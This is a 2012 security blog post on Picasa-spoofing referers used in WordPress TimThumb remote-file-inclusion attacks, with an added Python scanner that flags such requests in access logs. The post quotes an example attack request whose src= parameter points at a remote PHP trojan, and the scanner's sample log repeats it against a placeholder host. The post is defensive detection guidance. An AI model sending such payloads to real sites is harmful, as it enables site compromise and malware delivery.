Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange-looking referer URLs and GET requests that appear to come from Picasa are being used by hackers to probe websites for vulnerabilities and inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in the string for your safety; the link leads nowhere). This particular example injects malware using the WordPress TimThumb exploit: the file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similar-looking hostname can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or something similar) should be regarded as extremely suspicious; the requesting IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen alongside WordPress TimThumb exploit attempts.

Any query string repeating www. is suspicious, although it may have been a user error, often from copy/pasting a link without fully overwriting the existing address; in that case at least the first www reference will normally be your blog or website (or a page on it). If a search engine has indexed something like this, resulting in a broken link to your site, whoever posted the link probably made a mistake, and it should be redirected to a suitable page.

Spam Comments Lead to Infected Sites

The script injection example could also be modified by comment spammers to direct visitors to sites of this nature. Should a comment spammer succeed in leaving a comment, the link could lead to a website with malware (viruses or trojans). I have found several of these malware-containing websites in the past few weeks. This is another good example of the dangers of comment spam. Spammers are no longer simply trying to SEO their websites through backlinks; they are targeting visitors to the websites and blogs the links are posted on, to infect these visitors' computers with malware.

PHP File Extensions in Lookup String

The referer string may contain a link to a PHP file. These are active server files (like WordPress uses) and should never appear in a referer URL string. When they are found, they show a clear attempt to inject malware into your site or blog.

Referer URLs and GET requests should seldom use an active file extension such as .php, since the extension is not required to serve the page. Once again, treat GET requests for PHP files as suspicious UNLESS they are created while you are logged in and editing content or performing other on-site activities.
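The checks described above (a URL embedded in a query parameter, a hostname that merely begins with a brand name like picasa.com, a PHP file in the referer, and a repeated www.) can be run over a web server access log. The following is an added example written for this page, not code from the original post; the log lines are constructed in Apache combined format and the attacker hostname is a placeholder rather than the real one from the post. The WELL_KNOWN_HOSTS list and the reason labels are this example's own choices.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (Apache combined format). Hostnames are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Mar/2012:10:01:22 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.attacker-placeholder.example/2.php HTTP/1.1" 200 512 "http://picasa.com.attacker-placeholder.example/2.php" "Mozilla/5.0"
198.51.100.9 - - [07/Mar/2012:10:02:05 +0000] "GET /about/ HTTP/1.1" 200 4096 "https://www.google.com/search?q=picasa+spoof" "Mozilla/5.0"
192.0.2.4 - - [07/Mar/2012:10:03:11 +0000] "GET /2012/03/post/?ref=www.example.com/www.other.example HTTP/1.1" 404 256 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Brand hostnames that attackers mimic as a leading label. A genuine host must BE one of
# these or end with ".<brand>"; "picasa.com.something.example" does not qualify.
WELL_KNOWN_HOSTS = ("picasa.com", "picasa.google.com", "google.com")


def spoofed_brand_host(host):
    """True if host starts with a well-known brand name but is not actually that domain."""
    host = host.lower()
    for brand in WELL_KNOWN_HOSTS:
        if host.startswith(brand + ".") and not (host == brand or host.endswith("." + brand)):
            return True
    return False


def embedded_urls(query):
    """Query-parameter values that are themselves absolute URLs (e.g. TimThumb's src=)."""
    return [v for _, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r'^https?://', v, re.I)]


def assess_request(target, referer):
    """Return a list of reason labels explaining why a request looks suspicious."""
    reasons = []
    parts = urlsplit(target)
    for url in embedded_urls(parts.query):
        reasons.append("url-in-query")
        u = urlsplit(url)
        if spoofed_brand_host(u.hostname or ""):
            reasons.append("spoofed-brand-host")
        if u.path.lower().endswith(".php"):
            reasons.append("remote-php-in-query")
    # Two or more "www." inside one query string is the repeated-www pattern.
    if len(re.findall(r'www\.', parts.query, re.I)) >= 2:
        reasons.append("repeated-www")
    if referer not in ("", "-"):
        r = urlsplit(referer)
        if r.path.lower().endswith(".php"):
            reasons.append("php-in-referer")
        if spoofed_brand_host(r.hostname or ""):
            reasons.append("spoofed-brand-referer")
    return reasons


def scan_log(text):
    """Parse each log line and collect (ip, target, sorted reasons) for flagged requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = assess_request(m.group("target"), m.group("referer"))
        if reasons:
            findings.append((m.group("ip"), m.group("target"), sorted(set(reasons))))
    return findings


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(reasons))
```

Run against the constructed lines, the first request is flagged on every check (URL in query, spoofed brand host, remote PHP file, PHP file and spoofed host in the referer), the Google search referer on the second line is left alone, and the third is flagged only for the repeated www. Requests for your own PHP files are deliberately not flagged here, since WordPress serves them legitimately and, as noted above, a logged-in editing session produces them routinely; that check needs knowledge of your sessions.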


About Mike

Web Developer and Techno-geek. Saltwater fishing nut. Blogger.

Posted on March 7, 2012, in General News, Internet Security, Malware.
